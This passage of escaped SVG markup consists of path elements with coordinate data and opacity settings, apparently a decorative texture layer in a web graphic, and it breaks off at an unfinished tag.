d=\"M600.59,62l2.14-1.93.07.87c2.81.33,5.62.75,8.44.87.42,0,1.19-1.39,1.28-2.2a10,10,0,0,0-.53-2.94c-.68-.56-1.32-1.17-2-1.67-3.19-2.25-6.4-4.47-9.6-6.71l-1.28,0c0,.3,0,.59,0,.89l3.51,2.9C598.91,57,598.36,59.78,600.59,62Z\" transform=\"translate(0 0)\"\n opacity=\"0.1\"></path>\n <path d=\"M793.24,26.65a4.59,4.59,0,0,0,3.1.52c2.12-.83,3.24-.36,3.73,1.81.19.88.13,1.95.62,2.58a5.36,5.36,0,0,0,2.64,1.81c.37.1,1.11-1.18,1.63-1.76-1.26-3.64-.74-7.86-5.65-8.65-.71-.12-1.29-1-2-1.17-1.14-.21-3.19-.42-3.36,0A12.07,12.07,0,0,0,793.24,26.65Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M945.42,45.14a7.4,7.4,0,0,1,2.3.36c4.19,1,8.38,2,12.55,3,1.46.37,3.3.56,4.23,1.54,2.66,2.8,5.85,2.55,9.14,2.33-3.18-1.55-6.24-3.5-9.58-4.56-4.33-1.36-8.92-1.9-13.34-3-2.63-.66-5.17-1.72-7.75-2.59C942.68,44.16,943.16,45.34,945.42,45.14Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M569.37,67.57c1.56,0,2.79.05,4,0,1.43-.07,2.86-.24,4.29-.36A24,24,0,0,0,574,64.28C570.65,62.58,569.09,63.81,569.37,67.57Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M705.23,41.47c.24,1,.49,2,.74,3,1.37.31,2.73.68,4.11.92a2.43,2.43,0,0,0,1.77-.14,2.19,2.19,0,0,0,.6-1.77C712.08,41.86,706.69,40.44,705.23,41.47Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M566.9,62.85l4.09-.37c0-.65,0-1.31.08-2l-3.93-.7Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M566.48,55.5c.88-.51,1.75-1,2.62-1.55,0-.33,0-.66,0-1l-2.67-.39h-.72l-1.25.23-.81,1.24C564,55.73,564.79,56.48,566.48,55.5Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M885.72,28.77c2.09-.33,4.87.74,5.44-2.68l-2.07-.77-3.41,3.4,0,0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M885.71,28.76l0,0h0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M885.71,28.76l0,0h0Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M402,64.38a12,12,0,0,0-3.8-.12l3.72,1.19C401.88,65.09,401.91,64.73,402,64.38Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M533.65,70.75l.94,2.17,1.85-1.85-1.39-.76Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1092.16,55.67c.14-.05.18-.35.26-.54l-.57-.24c-.08.19-.27.42-.21.56A.55.55,0,0,0,1092.16,55.67Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M18.44,71.94A8.27,8.27,0,0,0,18,71c-3.4-.93-11.69-5.11-18-8v6.54C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M19.56,70.79a2.81,2.81,0,0,1,1.29-2.4c3.26-1.37,7-2,9.89-3.8,3.33-2.12,6-4.61,8.93.21.19.31,1.5-.08,2.3-.14a11.13,11.13,0,0,0-.78-2.49A13.83,13.83,0,0,0,39.1,60c2-.16,3.6.18,4.53-.44,3.66-2.47,7.56-2.39,11.66-1.88.84.11,1.77-.56,2.67-.87A66.19,66.19,0,0,0,49.7,56c-2.08,0-4.12,1.07-6.22,1.3C35,58.2,26.47,59,18,59.82L13.3,64.15l.6,1.25C15.24,67.29,17,69,18,71,19.1,71.33,19.69,71.3,19.56,70.79Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M66.23,56.25c2.09.74,3.41.14,4.79-1.32a8.11,8.11,0,0,1,2.36-1.45c1.93,2.9,4,.68,6,0,.73,4.47,3.79,5.76,8.55,3.67l-2.66-3.47c2.36-.27,4.3,0,5.56-.73,3.88-2.43,7.67-1.82,11.69-.68.89.25,2.06-.52,3.11-.82L94,49.77q-8.62,1.41-17.24,2.8a2,2,0,0,1-1-.2,5.37,5.37,0,0,0-6.17,1.43,3.11,3.11,0,0,1-2.58.66,7.68,7.68,0,0,0-7.71,2.11c1,0,2,0,3-.06C63.62,56.43,65.09,55.85,66.23,56.25Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.29,66.23l-2.42-.78c0,.48,0,1-.05,1.46a22.28,22.28,0,0,0,9,3c3.72.58,8.26.5,10.54,5,.64,1.26,2.67,1.7,3.61-.49l0,0c-2.22.08-4.06,0-2.63-3.16.4-.88.23-2.77-.39-3.2a2.09,2.09,0,0,0-.52-.25c-.41,0-.82-.12-1.22-.21-.64,0-1.32,0-1.94,0l-1.4,0-.37.27c-2.69,2.28-9.66,2-11.95-.66-.2-.22-.17-.64-.24-1a7.52,7.52,0,0,0,3.54.79,2.26,2.26,0,0,1-.21-2c.19-.78-1.11-1.93-1.73-2.91a2.57,2.57,0,0,0-.14-.61c-2.85-.2-3.59,1.14-3.81,2.86A3.89,3.89,0,0,1,404.29,66.23Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M421.42,67.77a4.27,4.27,0,0,0-1.22-.21C420.6,67.65,421,67.72,421.42,67.77Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M421.42,67.77a4.27,4.27,0,0,0-1.22-.21C420.6,67.65,421,67.72,421.42,67.77Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.54,67.21c2.29,2.64,9.26,2.94,11.95.66l.37-.27c-2.41.06-4.83.21-7.23.13a2.23,2.23,0,0,1-1.79-.7,7.52,7.52,0,0,1-3.54-.79C404.37,66.57,404.34,67,404.54,67.21Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.54,67.21c2.29,2.64,9.26,2.94,11.95.66l.37-.27c-2.41.06-4.83.21-7.23.13a2.23,2.23,0,0,1-1.79-.7,7.52,7.52,0,0,1-3.54-.79C404.37,66.57,404.34,67,404.54,67.21Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.29,66.23A3.89,3.89,0,0,0,402,64.38c0,.35-.07.71-.08,1.07Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M404.29,66.23A3.89,3.89,0,0,0,402,64.38c0,.35-.07.71-.08,1.07Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M398.39,72.46c1.45-.38,3-.49,4.64-.75l-1.86-3.45c-3,3.64-5.33,3.67-8.89.42a22.56,22.56,0,0,0-4.12-2.4C389,69.59,395.25,73.29,398.39,72.46Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1899.43,110.37a4.84,4.84,0,0,0-2.63,1.43,7.83,7.83,0,0,0,2.63-1.11Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1788.06,100.5c1.9-.27,3.93.29,5.9.52,3.39.4,6.78.86,10.17,1.23.38,0,.79-.49,1.21-.52a11.9,11.9,0,0,1,3.42,0,24,24,0,0,1,3.82,1.48c.32-.46.74-.79.8-1.17.32-2.1,1.85-2.36,3.2-1.6.59.33.8,2.25.44,3.13-.76,1.86-2.44,3.59-.39,5.47,2.55,2.34,10.5,1.49,13.12-1a5,5,0,0,1,3.69-1.39c6,1,6,1.16,8.38-4.58.12-.27.43-.45,1.08-1.11,1.41,2.23,2.65,4.31,4,6.3,1.77,2.59,2.83,2.52,4.39-.13.7-1.19,1.53-2.29,2.31-3.43l1.12.12,1.85,8.84c1.67-.23,3.16-.81,4.47-.54,2.45.51,4.64,1.26,6.68-1.11.52-.61,2.25-.65,3.22-.32,7.35,2.44,15.29,3.58,21.22,9.29a6.59,6.59,0,0,0,1.53.83c2.11-1,3.77-2.24,5.51-3l-.9-.45,1-1.4,0,0c1.17-.83,2.34-1.66,3.5-2.51.49-.36.94-.79,1.41-1.18-.47-.52-.84-1.34-1.41-1.51a7.28,7.28,0,0,0-3.42-.33v.32a7.83,7.83,0,0,1-2.63,1.11,8,8,0,0,0-1.56,2.31c0-.69-.07-1.38-.08-2.07-5,.32-10.51-2.38-14.93.57,4.42-3,10-.25,14.93-.57a21,21,0,0,0-.41-4.29,38.5,38.5,0,0,0-2.41-5.92l-.92,1.3a51.21,51.21,0,0,0-5.5-.55,2.76,2.76,0,0,0-2.16,1.12c-.33.66,0,1.7.15,2.56.22,1.54.48,3.07.72,4.6-2-.32-4-.6-6-1-.6-.12-1.12-.83-1.68-.85a8.2,8.2,0,0,1-7.45-5,8.36,8.36,0,0,0-1.19-1.93c-4.34.38-7.91.8-11.48.92-.8,0-1.6-1-2.45-1.55-2.23-1.3-4.53-2.48-6.7-3.87a11.48,11.48,0,0,1-2.06-2.26l-1.31.09-7.11,3.44c.51-1.71,1-3.16,1.39-4.61l-3.23,1c-1.26,2.74-3.89,2.28-5.58,1.44-2.47-1.24-4.46-3.43-6.66-5.22l-2.63.37c-.42.3-.85.59-1.28.88L1815,92l-1.3.24-3.86,2.42c-1.06,2.07-2.71,2.13-4.61,1.34l-2,.34c-1.4,2.37-2.54,1.9-3.54-.31l-4.15-5.71-.76-.53-1.31.27-1.31.91c-2.15,1.16-4.26,2.4-6.47,3.43-1.68.78-3.49,1.3-5.23,1.93C1782,99.51,1784.34,101,1788.06,100.5Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1705.46,85.81a4.38,4.38,0,0,1,2.31,1.83c.48.62.57,1.54,1.16,3.35l3.73-5.94c.35,2.51.61,4.36.86,6.22l.77.24c1-1.51,2-3,3.23-4.79,2.69,1.59,6.16,2.57,7.75,4.86,1.93,2.75,3.55,3.7,6.59,2.4,1.4,2.3,2.34,5.58,5.88,2.53.35-.3,1.47.34,2.24.5a8.85,8.85,0,0,0,8.53-3.59l-4-3.33-3,3h0c-.52,1.87-1.45,2.1-2.77.67l-.67-.18c-1-.54-2.47-.86-2.81-1.66-2.73-6.37-7.81-7.43-13.86-6.49-2.44.37-4.15,0-3.55-3.09a.36.36,0,0,0-.25-.27c-4-.29-7.86,2.62-12,.33-.9-.5-2.86,0-3.82.74-2.33,1.78-4.2,1.33-6.39-.17-.93-.65-2.32-.65-3.5-1-.5,1.42-1,2.84-1.79,5.11,3.6-.5,6.59-1,9.59-1.3A24.79,24.79,0,0,1,1705.46,85.81Z\"\n transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1616.21,78.62c2-2.87,4.61-3.18,6.76-.66,2.6,3.06,2.77,3,5.06-.82-1-.57-1.93-1.52-3-1.65-3.2-.39-6.44-.47-9.67-.68l-4.24,4.74C1613.32,81.87,1614.91,80.48,1616.21,78.62Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1609,78.85c.28.23.86.08,1.31.1-1.29-1.66-2.49-4.6-3.87-4.69-2.6-.16-5.36,1.18-7.91,2.24-.64.27-.72,1.85-1.06,2.83.69-.37,1.39-.7,2.06-1.09C1604,75.56,1605,75.63,1609,78.85Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1689.47,82.26c-2.45-1.14-4.89-2.32-7.36-3.4-.47-.2-1.11,0-1.65,0-2.38-.31-4.75-.66-7.12-1l-1.11.79,16.92,3.72C1689.25,82.37,1689.36,82.29,1689.47,82.26Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1779.28,96.53c-3-3.4-6-1.4-9,0C1772.54,98.87,1776.37,98.87,1779.28,96.53Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M1594.13,82.33c1.61,0,3.09.11,2.72-2.21-1.14.14-2.4.66-3.4.36-2.12-.65-3.2,0-3.75,2C1591.18,82.43,1592.66,82.29,1594.13,82.33Z\" transform=\"translate(0 0)\" opacity=\"0.1\"></path>\n <path d=\"M533.93,38.55c1.78-.33,3.59-.56,5.33-1a4.91,4.91,0,0,0,2.4-1.38c2.58-3,3.41-3,5.28.44.31.57.66,1.12.52.89,5.77.28,10.93.33,16,.85,2.32.23,4.13.6,5.24-2.09a9.67,9.67,0,0,1,2.74-3.41c.48-.4,1.62,0,2.46,0,.06-1.14.11-2.28.22-4.4l-3.47,2.63c-.13-1.71-.22-3-.31-4.21l-2-2.13c-3.21.4-2.52,3-2.58,4.94-.06,2.22.13,4.84-2.28,5.46-3.08.79-6.62,1.46-9.56.67-3.29-.87-3.59-6.11-1.09-8.56.6-.59.84-1.54,1.41-2.19a3.94,3.94,0,0,1,2.84-1.43,49.65,49.65,0,0,0-1.49,6.3c-.08.67,1.28,2.2,1.62,2.1a4.61,4.61,0,0,0,2.82-1.94c.4-1-.58-2.52-.25-3.59.66-2.06,1.31-4.72,2.88-5.74,2.42-1.58,5.72-1.73,8.43-3,3.87-1.76,7.72-.72,11.6-.57h0c-.16-2.46,1.55-2.79,3.33-2.69,3,.16,6,.52,9,.8L607.9,11l2.8-1.25,1.3,0,0-1.26c-3.16.74-6.38,1.27-9.45,2.28-4.88,1.61-9.67,3.15-14.91,1.84a7,7,0,0,0-3.33.25c-8.14,2.16-16.26,4.42-24.41,6.56-3.71,1-7.51,1.62-11.2,2.67-2.72.77-5.24,2.36-8,2.84-3.36.58-4.53,2.07-4.5,5.41,0,1.23-1.49,3.42-2.49,3.54-2.88.32-3.1,2-3.37,4l3.69,1.58Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1069.52,43.37l6.19-1.24,1.31-.45,4-.58,4.89.68c4-1.88,4-1.87,5.69,2.55a30,30,0,0,0,1.2,2.79c3,5.86,3,5.82,9.09,4.29a3.72,3.72,0,0,1,2.5.41c3.12,1.85,6,3.88,4,8.29-.1.22.29.67.43,1l2.85-3c.73,1.58.37,2.94.81,4a30.58,30.58,0,0,0,3,4.62l2.47-2.29c-3.46.83-3.83.5-2.92-2.82a26.61,26.61,0,0,1,1.57-4.47c2.18-4.49.74-6.59-4.32-6.9a8.72,8.72,0,0,1-5.34-2.22c-4.86-5-4.74-5.09-9.11-.07-.12.14-.42.13-1.17.33a57.38,57.38,0,0,0-3.49-6.28,6.85,6.85,0,0,0-3.62-2.76,29,29,0,0,0-7.28-.17,55.42,55.42,0,0,0-6,.93c-2.17.37-4.32,1-6.51,1.12-3.65.3-7.51-.39-10.39,2.76a37.77,37.77,0,0,1,5.49-1.08A22.42,22.42,0,0,1,1069.52,43.37Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M617.44,10.24l4-.6c2.61,0,5.23,0,7.84,0,1.34,0,3.05.26,3.94-.43,2.59-2,4.75-1.78,6.83.48,1.62,1.76,2.72,1.95,4-.46,1.51-2.85,4.23-3.12,7.28-1.54a6,6,0,0,0,4.36.58c6.13-2.4,12.57-2.23,18.93-2.74,3.46-.56,7-1.81,10.21.74l4.74.62a15.85,15.85,0,0,1,2.84-.56c4.63-.14,9.26-.19,13.88-.27-1.36-.58-2.7-1.6-4.09-1.68C696,4,689.76,4.05,683.55,3.68c-9.12-.54-18.06,0-26.8,2.94-2.41.79-5,1-6-2.06-1.81.4-3.33.78-4.87,1.06-4.51.82-9,1.63-13.55,2.35-.83.13-1.74-.35-2.6-.31-5.24.23-10.47.54-15.7.83.25.56.5,1.13.74,1.7Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M493.05,53.3c1.63-.29,3.58,1.17,5.41,1.83l-4,3,5.83-.32c-.77-1.85-1.34-3.24-1.91-4.62-2.49-1.88-5-1.26-8-1.06-5.54.37-11.23-1.28-16.85-2.09l0-1.24L484,46.55a47.15,47.15,0,0,0-23.08,2.63,88.07,88.07,0,0,0,12.06,2.33C479.62,52.26,486.13,54.53,493.05,53.3Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M617.52,33.74l-2.9,2.16c4.85.88,4.8.88,4.91,5.68a45.67,45.67,0,0,0,.64,4.92c.26.28.53.56.79.85.41-.65,1.2-1.31,1.17-1.94-.11-2.44.58-3.63,3.32-3.92,2.18-.23,2.73-3.36,1.31-5.25C624.32,33,621,33.28,617.52,33.74Z\" transform=\"translate(0 0)\"\n opacity=\"0.6\"></path>\n <path d=\"M592,35.75c.83.74.73,2.5,1.25,4.78,1.89-.85,4.3-1.41,5.94-2.85,1-.83.64-3.09.83-4.27l3.15-3.29c-1.79,0-3.4-.16-4.42,2.16-.47,1.08-3.12,2.2-4.26,1.8-2.61-.91-4.76-1.43-7.06.56-.25.21-1.44-.91-2.25-1a7.84,7.84,0,0,0-2.46.46,45.78,45.78,0,0,0,5.58,1.79C589.46,36.1,591.3,35.16,592,35.75Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M535,51.31h4.2l4,.53,6.14.22,8.15,0c1.39-1.53,2.47-.9,3.44.5l-.07.12,2.68-.2c.05-.49.11-1,.16-1.47l-34.16-.94c.46.4.93.79,1.4,1.18Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M517.28,49.94l6.22.66,1.93.06L527.5,50l-19.06-2,1.41,1.82Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M597.32,44.41c-3.3.19-6.6.39-9.89.64-.23,0-.43.47-.64.73,2.5,2.16,7.06,1.78,11-.9C597.6,44.72,597.45,44.41,597.32,44.41Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M495.61,47.63c3.15.56,6.32,1.11,9.5,1.46.62.07,1.34-.72,2-1.11l-12.29-1.33C495.09,47,495.3,47.57,495.61,47.63Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M565,50.56c3.78-.16,7.57-.31,11.36-.5.1,0,.18-.37.28-.56C572.61,48.09,568.66,47.69,565,50.56Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1057.93,47.77c.24-1.13.47-2.26.71-3.39l-4.88,3.36,2.17.72Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M599,45.28c1.41,1,3.57.47,5.53-1.37C602.08,41.91,601,45.43,599,45.28Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1121.39,64.36l-2.2,0C1119.91,65.91,1120.64,65.94,1121.39,64.36Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M526.91,66.87l2.61.91,2.14,1.15,2,1.82,1.4-.44,2-1.44a1.48,1.48,0,0,1,.19-.57l.66-6.21a1.43,1.43,0,0,1-.16-.57l-4.71.66-1,.27-1.9,2.76c-.82-2.42-1.29-3.8-1.75-5.17l-.05-.07C524.76,61.66,526.48,64.39,526.91,66.87Z\" transform=\"translate(0 0)\"\n opacity=\"0.6\"></path>\n <path d=\"M699.28,46.12c3.9.2,5-.72,5.5-4.49l-.82-.25C701.9,42.43,699.31,43,699.28,46.12Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M637.78,32.05q-.85,2.46-1.7,4.92c1.48-2,3-1.49,4.48,0L642,34.88c0-.45,0-.9,0-1.35Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M18.44,71.94c-.93-2.4-3-4.37-4.54-6.54.79,2.21-6.73-1-13.9-4.05v8.19C7.73,71.3,20,76,18.44,71.94Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M227.49,59.55a14.62,14.62,0,0,1,5.39.15c3.79.67,7.5,2,11.3,2.29,7.86.56,15.75.58,23.63.85,1.79.06,3.59.2,5.36.43,2.28.29,4.53.71,6.79,1.08a25.57,25.57,0,0,1,3.07-.78c3.39-.47,6.81-.78,10.2-1.29,2.15-.33,2.83.77,3,2.6l1.31.32c5.86-3.59,12-2.37,18.3-1.54a78,78,0,0,1,15.47,4.16c2.66.92,6.07-.34,9.15-.61-.14-.18-.28-.52-.4-.51-5.7.44-11.06-.46-15.85-3.8-.08-.06-.22,0-.33,0-6.14-.46-12.22-1.2-17.88-3.9a4.73,4.73,0,0,0-2.35-.15c-4.42.5-8.83,1.16-13.27,1.57-3.8.35-6-1.15-7.51-4.46-.28-.61-1.05-1.43-1.54-1.4a2.21,2.21,0,0,0-1.5,1.47c-.38,1.81-.48,3.69-.76,6.12-2.94-.82-5.8-1.2-8.24-2.42-2.13-1.07-3.35-.79-5.11.57-1.29,1-3.9,2.11-4.71,1.52-2.88-2.1-5.68-1.35-8.74-1.16s-6-.46-9-.87c-1.75-.25-3.45-.88-5.2-1.13-5.63-.81-11.27-1.61-16.92-2.21-1.55-.16-3.18.41-4.77.64C219.93,58.68,223.34,60.44,227.49,59.55Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M107.68,50.62,109,50l1.34-.16h1.37l3.38.24,7.53.69c3.79-.37,7.58-.94,11.38-1,2.78-.09,5.59.74,8.37.6,4.39-.2,8.66-.6,12.82,1.52,1.39.71,3.31.41,5,.5,5.85.3,11.71.5,17.55.87,5.36.33,10.71.82,16.06,1.29,2,.17,4,.53,6,.67a12.84,12.84,0,0,0,2.58-.33c-3.2-.48-6.38-1.08-9.58-1.41-4-.42-8.2-.17-12.13-1-6.24-1.36-12.38-2.39-18.8-1.53a24.07,24.07,0,0,1-6.73-.53A4.51,4.51,0,0,1,152.65,49c-1.62-2-2.9-4.19-4.57-6.09a4.87,4.87,0,0,0-3.17-1.67c-.6,0-1.54,1.58-1.78,2.58-.85,3.6-2,4.58-5.7,3.95-3-.52-6.07-2.29-8.83.75-.3.32-1.29,0-2,0l-17.77,0c-2.55,0-5.1-.13-7.63.08s-4.86.75-7.29,1.15l11.69,1.71Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M360.25,69.74a19.45,19.45,0,0,0,14.27-2c.71-.37,1.78,0,2.68,0l6.27-.07,2.08-.58,1.19-.92,4.8-1.7c-1-1.37-1.64-3.69-3.93-1.23A12,12,0,0,1,385,64.85c-.33-1-.63-2-1-3a18.81,18.81,0,0,0-1.68-4.41,12,12,0,0,0-3.45-3.06c-1.13-.74-2.77-1.81-3.68-1.45s-1.92,2.22-2,3.47c-.16,3.27.3,6.5,4,8.14l-5.48,2.41L366,69.46l1.26-4.74c-4.21,3.49-8.38,3.43-12.54,2.69.26.7.53,1.4.79,2.09A18.31,18.31,0,0,1,360.25,69.74Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M348.81,67.74c2.05,1.76,4.37,1.82,6.69,1.76-.26-.69-.53-1.39-.79-2.09-1.83-.33-3.65-.78-5.48-1.14-.8-.15-1.81.75-2.73,1.16C347.29,67.52,348.32,67.32,348.81,67.74Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M398.14,57.66c-1.34,1.74-2.11,3.92-3.14,5.9l-.21.18.13.24,4.18-3.2,1.3-.76a16.63,16.63,0,0,0,1.42-3.64c.68-4.85,3.49-7,8.2-6.2.6.09,1.37-.88,2.06-1.36-.95-.27-1.94-.86-2.84-.74-3.33.45-5.75-.55-7.18-3.7a12.14,12.14,0,0,0-1.77-2.05c-2.86,6.11-7.58.56-11.51,2.26a21.74,21.74,0,0,0,5.76,3.5C400,50.22,401.48,53.3,398.14,57.66Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M18,59.82c-3.68-.16-5.72,1.74-4.66,4.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1345.25,39.33c.3,0,.55.88.77,1.37.58,1.23,1.13,2.47,1.69,3.7l2.78-5.82-7-6-.67.1C1342.29,35.36,1339.64,38.82,1345.25,39.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1348.71,56.82c1.07,2,1.79,1.74,3.33.61.7-.52,2.73-.57,3-.14,2.09,3.45,6.52,5.43,6.51,10.21a2.57,2.57,0,0,0,.77,1.48c4,4.4,9.59,5.64,14.78,7.72-2.36-2.43-1.84-7-6.08-8.1-.31-.08-.28-1.2-.54-1.77a4.87,4.87,0,0,0-1.22-2c-2.44-1.76-3.56-4.63-2.31-7.25.46-1,1.66-1.6,2.52-2.39a10.27,10.27,0,0,1,1.53,2.56c1.57,6.2,2.6,7.28,7.45,7.5l.09,5.57,1.23,0c.27-1.59.53-3.18,1-5.86,3.67,4.78,7.64,5.42,12,3.82.32-2.42.6-4.58.9-6.79l-2.77-.25c2.64-2.3,2.94-6.83,6.84-7.06-.26,2.92-.5,5.68-.78,8.8,1.51-.67,2.58-1.51,3-1.26,2.8,1.75,4.12.21,5.78-1.86,1.06-1.32,2.8-1.86,3.72.87.47,1.39,2.2,3.53,3,3.39a24.34,24.34,0,0,0,7.85-3c.78-.44.74-2.47.89-3.8s.12-2.9.17-4.35l-4.43-3.18-2.82,4.13c-2.88-.62-5.19-1.4-7.54-1.54s-5.25,1.11-7.38.33c-4-1.47-7.74-1.09-12.06.48a60.15,60.15,0,0,0-1.34-6.22,5,5,0,0,0-2-2.32,8.13,8.13,0,0,0-2.6-.63c-4.54-1.08-9-2-13.14,1.33a1.15,1.15,0,0,1-.59.32c-1,0-2.67.35-3-.14a5.71,5.71,0,0,1-.79-3.75,3,3,0,0,1,2.19-1.91c2.28,0,3.34-1.09,3-3.06s-1-4.09-3.92-3.47l1,2.41c-5.2,4-5.45,7-1.59,12.2a7.69,7.69,0,0,1,1.12,4.78,16.93,16.93,0,0,1-2,6.45c-.66-2.71-1.33-5.41-2.15-8.73a12.13,12.13,0,0,1-2,2.32c-.81.54-2,1.24-2.76,1-3.9-1.42-7.57-.73-11.24.69C1346.42,55.58,1348.18,55.86,1348.71,56.82ZM1375,55.71l3.17.95c1.82-1.8,2.31-3.65,1.13-6.07-.37-.74.35-2,.57-3,1,.58,2.29.94,3,1.79a45.93,45.93,0,0,1,3.11,5.31c-2.2,5.44-3.26,6.29-5.41,4.5l-3.89,2.24-2.7-4.92Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1429.65,59.51l3.06-1.52c.23,2.5-1.93,5,1.42,6.94l1.95-4.61,6.73,4.13,2.06-6c2.61,1.08,5.58,1.46,7.18,3.14,2.69,2.82,2.31,3.16,4.89.34a8.88,8.88,0,0,1,1.73-1.1c-.55,1.79-1,3.11-1.36,4.43l.72.38,3.19-1.9,2.57,3.17,3.38-4c2.19,1.56,3.36.64,4.3-1.57a3.45,3.45,0,0,1,2.45-1.77c.65,0,2,1.33,1.92,1.9-.14,1-1.18,1.76-1.85,2.62-.24.31-.52.58-.8.9,2.72,2.6,3.66-1,5.56-1.39l1.82,2.69c3.6-1.56,7.17-2.85,10.48-4.63,2.13-1.15,3.15-.7,4.45,1.1,1.48,2.05,3.51,3.51,7.27,3.65l-3.55-4.65a38.14,38.14,0,0,1,3.73,1.53c4.47,2.55,6.71,2,9.73-2.09a4.21,4.21,0,0,1,2.82-1.14,11.3,11.3,0,0,1,3,.6c1.52.3,3.49.1,4.44,1,.75.71.27,2.73.34,4.33a9.11,9.11,0,0,0,1.13-.48c4.42-2.68,5-2.61,8.87,1a3,3,0,0,0,5-1.65,28.62,28.62,0,0,0,.39-3.35c-1.18-.17-2.38-.28-3.54-.54-.94-.21-2.19-.33-2.69-1-2.81-3.64-7.42-3-11-4.73-.53-.25-1.77,1.16-2.76,1.63-1.19.56-2.6,1.53-3.68,1.29-4.88-1.06-6.15-.72-8.55,3.33l-5.16-.84c1.76-1.94,3.09-3.39,4.34-4.75-1.52-2.92-3.62-2.05-5-.87s-1.88,3.11-3,5.11c.11-3.16-.94-4.58-4.1-4.6-2.37,0-4.7-1.27-7.09-1.67a11.57,11.57,0,0,0-5,.06c-5.69,1.72-11.31,3.2-17.18.85a3.25,3.25,0,0,0-1.64-.14c-4.84.8-9.6,1-14.13-1.42a2.26,2.26,0,0,0-1.89-.12c-3.88,2.49-7.63,1.6-11.47-.11-.83-.37-2.19-.7-2.78-.29a4.61,4.61,0,0,1-5,.26c-1.55-.71-3.2-1.21-5.14-1.92-.25.81-.51,1.61-.76,2.42C1424.18,52.92,1427.59,55.41,1429.65,59.51Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path d=\"M1551.42,67.2c.56-1.29,1-2.54,1.61-3.69,1-1.93,4.37-2.72,5.42-1.28,2.92,4,7,4.8,11.86,4.8-.43-1.29-.75-2.21-1-3l5.34-4.25c2.54,2.71,4.76,5.31,7.28,7.57.67.61,2.35.44,3.42.14a5,5,0,0,0,1.9-1.28c1.89.52,3.92,1.38,4.11,1.08,1.62-2.56,5.43-3.51,5.47-7.21-2.48-.1-5.16-.84-7.4-.15-2.72.84-4.89.35-7.47-.28a38,38,0,0,0-9.55-.55c-2.6,0-5.18.76-7.78.85-3.25.12-6.57-.48-9.76,0-2.3.31-3.86.26-5.24-1.75a3.27,3.27,0,0,0-2.34-.91c-1.65,2.19-3.6,3.28-6.38,2.48-.1,0-.36.5-.55.77l1,6.9C1544.78,64.68,1547.93,65.4,1551.42,67.2Z\"\n transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n <path 